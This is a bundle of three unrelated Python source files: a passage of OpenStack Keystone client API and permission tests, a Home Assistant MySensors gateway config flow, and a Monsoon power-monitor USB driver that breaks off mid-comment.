creds = client.ec2.list(user_id=self.user_foo['id'])
self.assertEquals(creds, [])
def test_ec2_credentials_create_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
self.assertRaises(client_exceptions.NotFound,
client.ec2.create,
user_id=uuid.uuid4().hex,
tenant_id=self.tenant_bar['id'])
self.assertRaises(client_exceptions.NotFound,
client.ec2.create,
user_id=self.user_foo['id'],
tenant_id=uuid.uuid4().hex)
def test_ec2_credentials_delete_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
self.assertRaises(client_exceptions.NotFound,
client.ec2.delete,
user_id=uuid.uuid4().hex,
access=uuid.uuid4().hex)
def test_ec2_credentials_get_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
self.assertRaises(client_exceptions.NotFound,
client.ec2.get,
user_id=uuid.uuid4().hex,
access=uuid.uuid4().hex)
def test_ec2_credentials_list_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
self.assertRaises(client_exceptions.NotFound,
client.ec2.list,
user_id=uuid.uuid4().hex)
def test_ec2_credentials_list_user_forbidden(self):
from keystoneclient import exceptions as client_exceptions
two = self.get_client(self.user_two)
self.assertRaises(client_exceptions.Forbidden, two.ec2.list,
user_id=self.user_foo['id'])
def test_ec2_credentials_get_user_forbidden(self):
from keystoneclient import exceptions as client_exceptions
foo = self.get_client()
cred = foo.ec2.create(user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'])
two = self.get_client(self.user_two)
self.assertRaises(client_exceptions.Forbidden, two.ec2.get,
user_id=self.user_foo['id'], access=cred.access)
foo.ec2.delete(user_id=self.user_foo['id'], access=cred.access)
def test_ec2_credentials_delete_user_forbidden(self):
from keystoneclient import exceptions as client_exceptions
foo = self.get_client()
cred = foo.ec2.create(user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'])
two = self.get_client(self.user_two)
self.assertRaises(client_exceptions.Forbidden, two.ec2.delete,
user_id=self.user_foo['id'], access=cred.access)
foo.ec2.delete(user_id=self.user_foo['id'], access=cred.access)
def test_service_create_and_delete(self):
from keystoneclient import exceptions as client_exceptions
test_service = 'new_service'
client = self.get_client(admin=True)
service = client.services.create(name=test_service,
service_type='test',
description='test')
self.assertEquals(service.name, test_service)
service = client.services.get(id=service.id)
self.assertEquals(service.name, test_service)
client.services.delete(id=service.id)
self.assertRaises(client_exceptions.NotFound, client.services.get,
id=service.id)
def test_service_list(self):
client = self.get_client(admin=True)
test_service = 'new_service'
service = client.services.create(name=test_service,
service_type='test',
description='test')
services = client.services.list()
# TODO(devcamcar): This assert should be more specific.
self.assertTrue(len(services) > 0)
def test_service_delete_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.services.delete,
id=uuid.uuid4().hex)
def test_service_get_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.services.get,
id=uuid.uuid4().hex)
def test_endpoint_create_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.endpoints.create,
region=uuid.uuid4().hex,
service_id=uuid.uuid4().hex,
publicurl=uuid.uuid4().hex,
adminurl=uuid.uuid4().hex,
internalurl=uuid.uuid4().hex)
def test_endpoint_delete_404(self):
# the catalog backend is expected to return Not Implemented
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.HTTPNotImplemented,
client.endpoints.delete,
id=uuid.uuid4().hex)
def test_admin_requires_adminness(self):
from keystoneclient import exceptions as client_exceptions
# FIXME(ja): this should be Unauthorized
exception = client_exceptions.ClientException
two = self.get_client(self.user_two, admin=True) # non-admin user
# USER CRUD
self.assertRaises(exception,
two.users.list)
self.assertRaises(exception,
two.users.get,
user=self.user_two['id'])
self.assertRaises(exception,
two.users.create,
name='oops',
password='password',
email='oops@test.com')
self.assertRaises(exception,
two.users.delete,
user=self.user_foo['id'])
# TENANT CRUD
self.assertRaises(exception,
two.tenants.list)
self.assertRaises(exception,
two.tenants.get,
tenant_id=self.tenant_bar['id'])
self.assertRaises(exception,
two.tenants.create,
tenant_name='oops',
description="shouldn't work!",
enabled=True)
self.assertRaises(exception,
two.tenants.delete,
tenant=self.tenant_baz['id'])
# ROLE CRUD
self.assertRaises(exception,
two.roles.get,
role='keystone_admin')
self.assertRaises(exception,
two.roles.list)
self.assertRaises(exception,
two.roles.create,
name='oops')
self.assertRaises(exception,
two.roles.delete,
role='keystone_admin')
# TODO(ja): MEMBERSHIP CRUD
# TODO(ja): determine what else todo
class KcMasterTestCase(CompatTestCase, KeystoneClientTests):
def get_checkout(self):
return KEYSTONECLIENT_REPO, 'master'
def test_tenant_add_and_remove_user(self):
client = self.get_client(admin=True)
client.roles.add_user_role(tenant=self.tenant_baz['id'],
user=self.user_two['id'],
role=self.role_useless['id'])
user_refs = client.tenants.list_users(tenant=self.tenant_baz['id'])
self.assert_(self.user_two['id'] in [x.id for x in user_refs])
client.roles.remove_user_role(tenant=self.tenant_baz['id'],
user=self.user_two['id'],
role=self.role_useless['id'])
user_refs = client.tenants.list_users(tenant=self.tenant_baz['id'])
self.assert_(self.user_two['id'] not in [x.id for x in user_refs])
def test_user_role_add_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.roles.add_user_role,
tenant=uuid.uuid4().hex,
user=self.user_foo['id'],
role=self.role_useless['id'])
self.assertRaises(client_exceptions.NotFound,
client.roles.add_user_role,
tenant=self.tenant_baz['id'],
user=uuid.uuid4().hex,
role=self.role_useless['id'])
self.assertRaises(client_exceptions.NotFound,
client.roles.add_user_role,
tenant=self.tenant_baz['id'],
user=self.user_foo['id'],
role=uuid.uuid4().hex)
def test_user_role_remove_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.roles.remove_user_role,
tenant=uuid.uuid4().hex,
user=self.user_foo['id'],
role=self.role_useless['id'])
self.assertRaises(client_exceptions.NotFound,
client.roles.remove_user_role,
tenant=self.tenant_baz['id'],
user=uuid.uuid4().hex,
role=self.role_useless['id'])
self.assertRaises(client_exceptions.NotFound,
client.roles.remove_user_role,
tenant=self.tenant_baz['id'],
user=self.user_foo['id'],
role=uuid.uuid4().hex)
self.assertRaises(client_exceptions.NotFound,
client.roles.remove_user_role,
tenant=self.tenant_baz['id'],
user=self.user_foo['id'],
role=self.role_useless['id'])
def test_tenant_list_marker(self):
client = self.get_client()
# Add two arbitrary tenants to user for testing purposes
for i in range(2):
tenant_id = uuid.uuid4().hex
tenant = {'name': 'tenant-%s' % tenant_id, 'id': tenant_id}
self.identity_api.create_tenant(tenant_id, tenant)
self.identity_api.add_user_to_tenant(tenant_id,
self.user_foo['id'])
tenants = client.tenants.list()
self.assertEqual(len(tenants), 3)
tenants_marker = client.tenants.list(marker=tenants[0].id)
self.assertEqual(len(tenants_marker), 2)
self.assertEqual(tenants[1].name, tenants_marker[0].name)
self.assertEqual(tenants[2].name, tenants_marker[1].name)
def test_tenant_list_marker_not_found(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
self.assertRaises(client_exceptions.BadRequest,
client.tenants.list, marker=uuid.uuid4().hex)
def test_tenant_list_limit(self):
client = self.get_client()
# Add two arbitrary tenants to user for testing purposes
for i in range(2):
tenant_id = uuid.uuid4().hex
tenant = {'name': 'tenant-%s' % tenant_id, 'id': tenant_id}
self.identity_api.create_tenant(tenant_id, tenant)
self.identity_api.add_user_to_tenant(tenant_id,
self.user_foo['id'])
tenants = client.tenants.list()
self.assertEqual(len(tenants), 3)
tenants_limited = client.tenants.list(limit=2)
self.assertEqual(len(tenants_limited), 2)
self.assertEqual(tenants[0].name, tenants_limited[0].name)
self.assertEqual(tenants[1].name, tenants_limited[1].name)
def test_tenant_list_limit_bad_value(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
self.assertRaises(client_exceptions.BadRequest,
client.tenants.list, limit='a')
self.assertRaises(client_exceptions.BadRequest,
client.tenants.list, limit=-1)
def test_roles_get_by_user(self):
client = self.get_client(admin=True)
roles = client.roles.roles_for_user(user=self.user_foo['id'],
tenant=self.tenant_bar['id'])
self.assertTrue(len(roles) > 0)
class KcEssex3TestCase(CompatTestCase, KeystoneClientTests):
def get_checkout(self):
return KEYSTONECLIENT_REPO, 'essex-3'
def test_tenant_add_and_remove_user(self):
client = self.get_client(admin=True)
client.roles.add_user_to_tenant(tenant_id=self.tenant_baz['id'],
user_id=self.user_two['id'],
role_id=self.role_useless['id'])
role_refs = client.roles.get_user_role_refs(
user_id=self.user_two['id'])
self.assert_(self.tenant_baz['id'] in [x.tenantId for x in role_refs])
# get the "role_refs" so we get the proper id, this is how the clients
# do it
roleref_refs = client.roles.get_user_role_refs(
user_id=self.user_two['id'])
for roleref_ref in roleref_refs:
if (roleref_ref.roleId == self.role_useless['id']
and roleref_ref.tenantId == self.tenant_baz['id']):
# use python's scope fall through to leave roleref_ref set
break
client.roles.remove_user_from_tenant(tenant_id=self.tenant_baz['id'],
user_id=self.user_two['id'],
role_id=roleref_ref.id)
role_refs = client.roles.get_user_role_refs(
user_id=self.user_two['id'])
self.assert_(self.tenant_baz['id'] not in
[x.tenantId for x in role_refs])
def test_roles_get_by_user(self):
client = self.get_client(admin=True)
roles = client.roles.get_user_role_refs(user_id='foo')
self.assertTrue(len(roles) > 0)
def test_role_list_404(self):
raise nose.exc.SkipTest('N/A')
def test_authenticate_and_delete_token(self):
raise nose.exc.SkipTest('N/A')
def test_user_create_update_delete(self):
from keystoneclient import exceptions as client_exceptions
test_username = 'new_user'
client = self.get_client(admin=True)
user = client.users.create(name=test_username,
password='password',
email='user1@test.com')
self.assertEquals(user.name, test_username)
user = client.users.get(user=user.id)
self.assertEquals(user.name, test_username)
user = client.users.update_email(user=user, email='user2@test.com')
self.assertEquals(user.email, 'user2@test.com')
# NOTE(termie): update_enabled doesn't return anything, probably a bug
client.users.update_enabled(user=user, enabled=False)
user = client.users.get(user.id)
self.assertFalse(user.enabled)
self.assertRaises(client_exceptions.Unauthorized,
self._client,
username=test_username,
password='password')
client.users.update_enabled(user, True)
user = client.users.update_password(user=user, password='password2')
self._client(username=test_username,
password='password2')
user = client.users.update_tenant(user=user, tenant='bar')
# TODO(ja): once keystonelight supports default tenant
# when you login without specifying tenant, the
# token should be scoped to tenant 'bar'
client.users.delete(user.id)
self.assertRaises(client_exceptions.NotFound, client.users.get,
user.id)
def test_user_update_404(self):
raise nose.exc.SkipTest('N/A')
def test_endpoint_create_404(self):
raise nose.exc.SkipTest('N/A')
def test_endpoint_delete_404(self):
raise nose.exc.SkipTest('N/A')
|
|
"""Config flow for MySensors."""
from __future__ import annotations
import os
from typing import Any
from awesomeversion import (
AwesomeVersion,
AwesomeVersionStrategy,
AwesomeVersionStrategyException,
)
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.components.mqtt import (
DOMAIN as MQTT_DOMAIN,
valid_publish_topic,
valid_subscribe_topic,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
import homeassistant.helpers.config_validation as cv
from . import (
CONF_DEVICE,
CONF_RETAIN,
CONF_VERSION,
DEFAULT_BAUD_RATE,
DEFAULT_TCP_PORT,
DEFAULT_VERSION,
is_persistence_file,
)
from .const import (
CONF_BAUD_RATE,
CONF_GATEWAY_TYPE,
CONF_GATEWAY_TYPE_ALL,
CONF_GATEWAY_TYPE_MQTT,
CONF_GATEWAY_TYPE_SERIAL,
CONF_GATEWAY_TYPE_TCP,
CONF_PERSISTENCE_FILE,
CONF_TCP_PORT,
CONF_TOPIC_IN_PREFIX,
CONF_TOPIC_OUT_PREFIX,
DOMAIN,
ConfGatewayType,
)
from .gateway import MQTT_COMPONENT, is_serial_port, is_socket_address, try_connect
def _get_schema_common(user_input: dict[str, str]) -> dict:
"""Create a schema with options common to all gateway types."""
schema = {
vol.Required(
CONF_VERSION,
description={
"suggested_value": user_input.get(CONF_VERSION, DEFAULT_VERSION)
},
): str,
vol.Optional(CONF_PERSISTENCE_FILE): str,
}
return schema
def _validate_version(version: str) -> dict[str, str]:
"""Validate a version string from the user."""
version_okay = True
try:
AwesomeVersion(
version,
[AwesomeVersionStrategy.SIMPLEVER, AwesomeVersionStrategy.SEMVER],
)
except AwesomeVersionStrategyException:
version_okay = False
if version_okay:
return {}
return {CONF_VERSION: "invalid_version"}
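# Illustrative outcomes (assuming AwesomeVersion accepts "2.3" under the
# SIMPLEVER strategy and rejects a non-version string):
#     _validate_version("2.3")        -> {}
#     _validate_version("not-a-ver")  -> {CONF_VERSION: "invalid_version"}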
def _is_same_device(
gw_type: ConfGatewayType, user_input: dict[str, Any], entry: ConfigEntry
) -> bool:
"""Check if another ConfigDevice is actually the same as user_input.
This function only compares addresses and tcp ports, so it is possible to fool it with tricks like port forwarding.
"""
if entry.data[CONF_DEVICE] != user_input[CONF_DEVICE]:
return False
if gw_type == CONF_GATEWAY_TYPE_TCP:
entry_tcp_port: int = entry.data[CONF_TCP_PORT]
input_tcp_port: int = user_input[CONF_TCP_PORT]
return entry_tcp_port == input_tcp_port
if gw_type == CONF_GATEWAY_TYPE_MQTT:
entry_topics = {
entry.data[CONF_TOPIC_IN_PREFIX],
entry.data[CONF_TOPIC_OUT_PREFIX],
}
return (
user_input.get(CONF_TOPIC_IN_PREFIX) in entry_topics
or user_input.get(CONF_TOPIC_OUT_PREFIX) in entry_topics
)
return True
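# For example, two TCP entries pointing at the same host count as the same
# device only when their CONF_TCP_PORT values also match, while MQTT entries
# collide as soon as either topic prefix is reused.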
class MySensorsConfigFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow."""
def __init__(self) -> None:
"""Set up config flow."""
self._gw_type: str | None = None
async def async_step_import(self, user_input: dict[str, Any]) -> FlowResult:
"""Import a config entry.
This method is called by async_setup and it has already
prepared the dict to be compatible with what a user would have
entered from the frontend.
Therefore we process it as though it came from the frontend.
"""
if user_input[CONF_DEVICE] == MQTT_COMPONENT:
user_input[CONF_GATEWAY_TYPE] = CONF_GATEWAY_TYPE_MQTT
else:
try:
await self.hass.async_add_executor_job(
is_serial_port, user_input[CONF_DEVICE]
)
except vol.Invalid:
user_input[CONF_GATEWAY_TYPE] = CONF_GATEWAY_TYPE_TCP
else:
user_input[CONF_GATEWAY_TYPE] = CONF_GATEWAY_TYPE_SERIAL
result: FlowResult = await self.async_step_user(user_input=user_input)
if errors := result.get("errors"):
return self.async_abort(reason=next(iter(errors.values())))
return result
async def async_step_user(
self, user_input: dict[str, str] | None = None
) -> FlowResult:
"""Create a config entry from frontend user input."""
schema = {vol.Required(CONF_GATEWAY_TYPE): vol.In(CONF_GATEWAY_TYPE_ALL)}
schema = vol.Schema(schema)
errors = {}
if user_input is not None:
gw_type = self._gw_type = user_input[CONF_GATEWAY_TYPE]
input_pass = user_input if CONF_DEVICE in user_input else None
if gw_type == CONF_GATEWAY_TYPE_MQTT:
# Naive check that doesn't consider config entry state.
if MQTT_DOMAIN in self.hass.config.components:
return await self.async_step_gw_mqtt(input_pass)
errors["base"] = "mqtt_required"
if gw_type == CONF_GATEWAY_TYPE_TCP:
return await self.async_step_gw_tcp(input_pass)
if gw_type == CONF_GATEWAY_TYPE_SERIAL:
return await self.async_step_gw_serial(input_pass)
return self.async_show_form(step_id="user", data_schema=schema, errors=errors)
async def async_step_gw_serial(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Create config entry for a serial gateway."""
errors: dict[str, str] = {}
if user_input is not None:
errors.update(
await self.validate_common(CONF_GATEWAY_TYPE_SERIAL, errors, user_input)
)
if not errors:
return self._async_create_entry(user_input)
user_input = user_input or {}
schema = _get_schema_common(user_input)
schema[
vol.Required(
CONF_BAUD_RATE,
default=user_input.get(CONF_BAUD_RATE, DEFAULT_BAUD_RATE),
)
] = cv.positive_int
schema[
vol.Required(
CONF_DEVICE, default=user_input.get(CONF_DEVICE, "/dev/ttyACM0")
)
] = str
schema = vol.Schema(schema)
return self.async_show_form(
step_id="gw_serial", data_schema=schema, errors=errors
)
async def async_step_gw_tcp(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Create a config entry for a tcp gateway."""
errors = {}
if user_input is not None:
if CONF_TCP_PORT in user_input:
port: int = user_input[CONF_TCP_PORT]
if not (0 < port <= 65535):
errors[CONF_TCP_PORT] = "port_out_of_range"
errors.update(
await self.validate_common(CONF_GATEWAY_TYPE_TCP, errors, user_input)
)
if not errors:
return self._async_create_entry(user_input)
user_input = user_input or {}
schema = _get_schema_common(user_input)
schema[
vol.Required(CONF_DEVICE, default=user_input.get(CONF_DEVICE, "127.0.0.1"))
] = str
# Don't use cv.port as that would show a slider *facepalm*
schema[
vol.Optional(
CONF_TCP_PORT, default=user_input.get(CONF_TCP_PORT, DEFAULT_TCP_PORT)
)
] = vol.Coerce(int)
schema = vol.Schema(schema)
return self.async_show_form(step_id="gw_tcp", data_schema=schema, errors=errors)
def _check_topic_exists(self, topic: str) -> bool:
for other_config in self._async_current_entries():
if topic == other_config.data.get(
CONF_TOPIC_IN_PREFIX
) or topic == other_config.data.get(CONF_TOPIC_OUT_PREFIX):
return True
return False
async def async_step_gw_mqtt(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Create a config entry for a mqtt gateway."""
errors = {}
if user_input is not None:
user_input[CONF_DEVICE] = MQTT_COMPONENT
try:
valid_subscribe_topic(user_input[CONF_TOPIC_IN_PREFIX])
except vol.Invalid:
errors[CONF_TOPIC_IN_PREFIX] = "invalid_subscribe_topic"
else:
if self._check_topic_exists(user_input[CONF_TOPIC_IN_PREFIX]):
errors[CONF_TOPIC_IN_PREFIX] = "duplicate_topic"
try:
valid_publish_topic(user_input[CONF_TOPIC_OUT_PREFIX])
except vol.Invalid:
errors[CONF_TOPIC_OUT_PREFIX] = "invalid_publish_topic"
if not errors:
if (
user_input[CONF_TOPIC_IN_PREFIX]
== user_input[CONF_TOPIC_OUT_PREFIX]
):
errors[CONF_TOPIC_OUT_PREFIX] = "same_topic"
elif self._check_topic_exists(user_input[CONF_TOPIC_OUT_PREFIX]):
errors[CONF_TOPIC_OUT_PREFIX] = "duplicate_topic"
errors.update(
await self.validate_common(CONF_GATEWAY_TYPE_MQTT, errors, user_input)
)
if not errors:
return self._async_create_entry(user_input)
user_input = user_input or {}
schema = _get_schema_common(user_input)
schema[
vol.Required(CONF_RETAIN, default=user_input.get(CONF_RETAIN, True))
] = bool
schema[
vol.Required(
CONF_TOPIC_IN_PREFIX, default=user_input.get(CONF_TOPIC_IN_PREFIX, "")
)
] = str
schema[
vol.Required(
CONF_TOPIC_OUT_PREFIX, default=user_input.get(CONF_TOPIC_OUT_PREFIX, "")
)
] = str
schema = vol.Schema(schema)
return self.async_show_form(
step_id="gw_mqtt", data_schema=schema, errors=errors
)
@callback
def _async_create_entry(self, user_input: dict[str, Any]) -> FlowResult:
"""Create the config entry."""
return self.async_create_entry(
title=f"{user_input[CONF_DEVICE]}",
data={**user_input, CONF_GATEWAY_TYPE: self._gw_type},
)
def _normalize_persistence_file(self, path: str) -> str:
return os.path.realpath(os.path.normcase(self.hass.config.path(path)))
async def validate_common(
self,
gw_type: ConfGatewayType,
errors: dict[str, str],
user_input: dict[str, Any],
) -> dict[str, str]:
"""Validate parameters common to all gateway types."""
errors.update(_validate_version(user_input[CONF_VERSION]))
if gw_type != CONF_GATEWAY_TYPE_MQTT:
if gw_type == CONF_GATEWAY_TYPE_TCP:
verification_func = is_socket_address
else:
verification_func = is_serial_port
try:
await self.hass.async_add_executor_job(
verification_func, user_input.get(CONF_DEVICE)
)
except vol.Invalid:
errors[CONF_DEVICE] = (
"invalid_ip"
if gw_type == CONF_GATEWAY_TYPE_TCP
else "invalid_serial"
)
if CONF_PERSISTENCE_FILE in user_input:
try:
is_persistence_file(user_input[CONF_PERSISTENCE_FILE])
except vol.Invalid:
errors[CONF_PERSISTENCE_FILE] = "invalid_persistence_file"
else:
real_persistence_path = user_input[
CONF_PERSISTENCE_FILE
] = self._normalize_persistence_file(user_input[CONF_PERSISTENCE_FILE])
for other_entry in self._async_current_entries():
if CONF_PERSISTENCE_FILE not in other_entry.data:
continue
if real_persistence_path == self._normalize_persistence_file(
other_entry.data[CONF_PERSISTENCE_FILE]
):
errors[CONF_PERSISTENCE_FILE] = "duplicate_persistence_file"
break
for other_entry in self._async_current_entries():
if _is_same_device(gw_type, user_input, other_entry):
errors["base"] = "already_configured"
break
# if no errors so far, try to connect
if not errors and not await try_connect(self.hass, gw_type, user_input):
errors["base"] = "cannot_connect"
return errors
|
|
import struct
from Monsoon import Operations as op
import ctypes
import platform
import usb.core
import usb.util
import numpy as np
import os
import time
class USB_protocol(object):
"""Uses native python usb functions to communicate with the Power Monitor.
Best choice for connecting to a single Power Monitor."""
def __init__(self):
self.DEVICE = None
def enumerateDevices(self):
"""Returns a list of the serial numbers of all devices connected to the system.
    Includes both HVPM and LVPM hardware."""
results = []
devices = usb.core.find(find_all=True, idVendor = 0x2AB9, idProduct = 0x0001)
for device in devices:
results.append(str(device.serial_number))
return results
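    # Usage sketch (serial numbers are hypothetical):
    #     proto = USB_protocol()
    #     proto.enumerateDevices()   # e.g. ['20001', '20417']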
def reconnect(self,deviceType, serialno):
"""Reset the port and reconnect to the power monitor.
        Useful when the device has gotten into a bad state and needs to re-enumerate."""
self.DEVICE.reset()
time.sleep(5)
#give device time to re-enumerate
#TODO: We should be able to replace this with waiting for the event that fires when
#A new device enumerates on the system.
self.Connect(deviceType,serialno)
def Connect(self,deviceType, serialno=None):
"""Connect to a Power Monitor.
deviceType = LVPM or HVPM
serialno = device serial number. If None, connect to the first device found"""
def device_matcher(d):
try:
return d.idVendor == 0x2AB9 and d.idProduct == 0x0001 and (serialno is None or d.serial_number == str(serialno))
            except Exception:  # Catches some platform-specific errors when connecting to multiple PMs simultaneously.
return False
self.DEVICE = usb.core.find(custom_match=device_matcher)
if (self.DEVICE is None):
print('Unable to find device')
return
connectedDeviceType = self.getValue(op.OpCodes.HardwareModel,2)
if(connectedDeviceType != deviceType):
print('warning: Device type mismatch. Found ' + repr(connectedDeviceType) + " expected " + repr(deviceType))
firmwareRev = self.getValue(op.OpCodes.FirmwareVersion,1)
if(firmwareRev < op.ReturnCodes.CURRENT_FIRMWARE_REV):
print('Warning: Detected firmware revision ' + repr(firmwareRev) + ", current release is " + repr(op.ReturnCodes.CURRENT_FIRMWARE_REV))
# On Linux we need to detach usb HID first
if "Linux" == platform.system():
            try:
                self.DEVICE.detach_kernel_driver(0)
            except usb.core.USBError:
                pass  # already unregistered
self.DEVICE.set_configuration()
cfg = self.DEVICE.get_active_configuration()
intf = cfg[(0,0)]
self.epBulkWriter = usb.util.find_descriptor(
intf,
custom_match = \
lambda e: \
usb.util.endpoint_direction(e.bEndpointAddress) == \
usb.util.ENDPOINT_OUT)
self.epBulkReader = usb.util.find_descriptor(
intf,
custom_match = \
lambda e: \
usb.util.endpoint_direction(e.bEndpointAddress) == \
usb.util.ENDPOINT_IN)
def BulkRead(self):
        return self.DEVICE.read(0x81, 64, timeout=1000)
def sendCommand(self,operation, value):
"""Send a USB Control transfer. Normally this is used to set an EEPROM value."""
if not self.verifyReady(operation):
self.stopSampling()
#TODO: We might smooth this behavior over later, but for now we want to explicitly fail if this occurs.
raise ValueError("Power Monitor Error, attempted to send a command while the unit is in Sample Mode.")
value = int(value)
value_array = struct.unpack("4B",struct.pack("I",value))
operation_array = struct.unpack("4b",struct.pack("I",operation))
wValue = struct.unpack("H",struct.pack("BB",value_array[0],value_array[1]))[0]
wIndex = struct.unpack("H",struct.pack("BB",operation_array[0],value_array[2]))[0]
self.DEVICE.ctrl_transfer(op.Control_Codes.USB_OUT_PACKET,op.Control_Codes.USB_SET_VALUE,wValue,wIndex,value_array,5000)
def stopSampling(self):
"""Send a control transfer instructing the Power Monitor to stop sampling."""
self.verifyReady(0x02)
self.DEVICE.ctrl_transfer(op.Control_Codes.USB_OUT_PACKET,op.Control_Codes.USB_REQUEST_STOP,0,0,0,5000)
def startSampling(self,calTime, maxTime):
"""Instruct the Power Monitor to enter sample mode.
calTime = Amount of time, in ms, between calibration samples.
maxTime = Number of samples to take before exiting sample mode automatically."""
if not self.verifyReady(0x02):
self.stopSampling()
raise ValueError("Power Monitor Error, attempted to start while already started.")
value_array = struct.unpack("4B",struct.pack("I",calTime))
maxtime_array = struct.unpack("4B",struct.pack("I",maxTime))
wValue = struct.unpack("H",struct.pack("BB",value_array[0],value_array[1]))[0]
wIndex = struct.unpack("H",struct.pack("BB",0,0))[0]
self.DEVICE.ctrl_transfer(op.Control_Codes.USB_OUT_PACKET,op.Control_Codes.USB_REQUEST_START,wValue,wIndex,maxtime_array,1000)
def resetToBootloader(self):
wValue = 0
wIndex = 0
wLength = 0
#This will cause a disconnect event, which throws an exception in libusb.
try:
self.DEVICE.ctrl_transfer(op.Control_Codes.USB_OUT_PACKET,op.Control_Codes.USB_REQUEST_RESET_TO_BOOTLOADER,wValue,wIndex,wLength,1000)
except:
print("Resetting to bootloader")
def getValue(self,operation,valueLength, signed = False):
"""Get an EEPROM value from the Power Monitor."""
operation_array = struct.unpack("4b",struct.pack("I",operation))
wIndex = struct.unpack("H",struct.pack("bb",operation_array[0],0))[0]
result = self.DEVICE.ctrl_transfer(op.Control_Codes.USB_IN_PACKET,op.Control_Codes.USB_SET_VALUE,0,wIndex,4,5000)
if(result == op.ReturnCodes.ERROR):
self.stopSampling()
raise ValueError("Error code returned. Attempted to query Power Monitor while in sample mode.")
if(valueLength == 4):
if(signed):
result = struct.unpack("i",result)[0]
else:
result = struct.unpack("I",result)[0]
elif(valueLength == 2):
if(signed):
result = struct.unpack("h",result[0:2])[0]
else:
result = struct.unpack("H",result[0:2])[0]
elif(valueLength == 1):
if(signed):
result = struct.unpack("b",result[0:1])[0]
else:
result = struct.unpack("B",result[0:1])[0]
return result
def closeDevice(self):
"""Cleanup any loose ends, if present."""
self.stopSampling()
self.DEVICE.reset() #Releases the bulk endpoint, which dispose_resources apparently doesn't release.
usb.util.dispose_resources(self.DEVICE)
def verifyReady(self,opcode):
"""Check whether we're currently in sample mode.
Some commands can cause errors if we are.
Current behavior checks for all opcodes, though there are some specific ones which will not return an error code."""
#Only check if the firmware version is 26 or greater
#getStartStatus command does not include 'Sample mode' bit before that revision.
firmwareRev = self.getValue(op.OpCodes.FirmwareVersion,1)
if(firmwareRev >= 26):
status = self.getValue(op.OpCodes.getStartStatus, 1)
return not np.bitwise_and(0x80,status)
else:
return True
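# Illustrative sketch (not part of the original module): a typical
# connect -> sample -> read -> stop -> close cycle. device_type must match the
# value reported by op.OpCodes.HardwareModel for the attached unit, and the
# calibration interval of 1250 is an assumed value, not taken from this file.
def _demo_usb_protocol(device_type, serialno=None):
    mon = USB_protocol()
    mon.Connect(device_type, serialno)
    if mon.DEVICE is None:
        return None
    mon.startSampling(1250, 0xFFFFFFFF)
    packet = mon.BulkRead()   # one bulk transfer of up to 64 bytes
    mon.stopSampling()
    mon.closeDevice()
    return packet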
class CPP_Backend_Protocol(object):
"""Uses C++ backend with libusb.
When connecting to multiple Power Monitors with the same computer, native Python code is often too slow, and results in many dropped samples.
    This offloads the time-critical parts of sample collection to C++, but isn't compatible with every OS yet.
"""
def __init__(self):
self.DEVICE = self.loadLibrary()
self.DEVICE.pySetup.argtypes = (ctypes.c_int, ctypes.c_int,ctypes.c_int)
self.DEVICE.pyStart.argtypes = (ctypes.c_int,ctypes.c_int)
self.DEVICE.pyGetBulkData.argtypes = (ctypes.c_int, ctypes.POINTER(ctypes.c_uint8))
self.DEVICE.pySendCommand.argtypes = (ctypes.c_ubyte, ctypes.c_int)
self.DEVICE.pyGetValue.argtypes = (ctypes.c_ubyte,ctypes.c_int)
self.queueSize = 1024
self.Queue = (ctypes.c_uint8*self.queueSize)()
ctypes.cast(self.Queue,ctypes.POINTER(ctypes.c_uint8))
def Connect(self,deviceType, serialno=None):
VID = 0x2AB9
PID = 0x0001
self.DEVICE.pySetup(VID,PID,serialno)
pass
def BulkRead(self):
self.DEVICE.pyGetBulkData(self.queueSize,self.Queue)
count = self.DEVICE.pyQueueCount()
result = self.Queue[0:count*64]
return result
def sendCommand(self,operation, value):
"""Send a USB Control transfer. Normally this is used to set an EEPROM value."""
self.DEVICE.pySendCommand(operation,int(value))
def stopSampling(self):
"""Send a control transfer instructing the Power Monitor to stop sampling."""
self.DEVICE.pyStop()
def startSampling(self,calTime, maxTime):
"""Instruct the Power Monitor to enter sample mode.
calTime = Amount of time, in ms, between calibration samples.
maxTime = Number of samples to take before exiting sample mode automatically."""
self.DEVICE.pyStart(calTime,maxTime)
def getValue(self,operation,valueLength):
"""Get an EEPROM value from the Power Monitor."""
return self.DEVICE.pyGetValue(operation,valueLength)
def closeDevice(self):
"""Cleanup any loose ends, if present."""
        self.DEVICE.pyClose()
def loadLibrary(self):
"""Tries to load the library in an OS-neutral way."""
#TODO: Currently we're distributing pre-compiled .dll and .so files.
#The proper way to do this will be including a makefile and compiling these libraries on installation.
path = os.path.abspath(__file__)
path = os.path.realpath(path)
path = os.path.dirname(path)
if(platform.system() == "Linux"):
libLocation=os.path.join(path,"Compiled/Linux/libcpp_backend.so")
        elif(platform.system() == "Windows"):
            libLocation = os.path.join(path,"Compiled/WIN32/Cpp_backend.dll")
else:
raise NotImplementedError("OS not currently supported.")
test = ctypes.CDLL(libLocation)
return test
def reconnect(self):
raise NotImplementedError
def findAllSerialNumbers(self):
raise NotImplementedError
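# Hypothetical command-line entry point (not in the original file): list the
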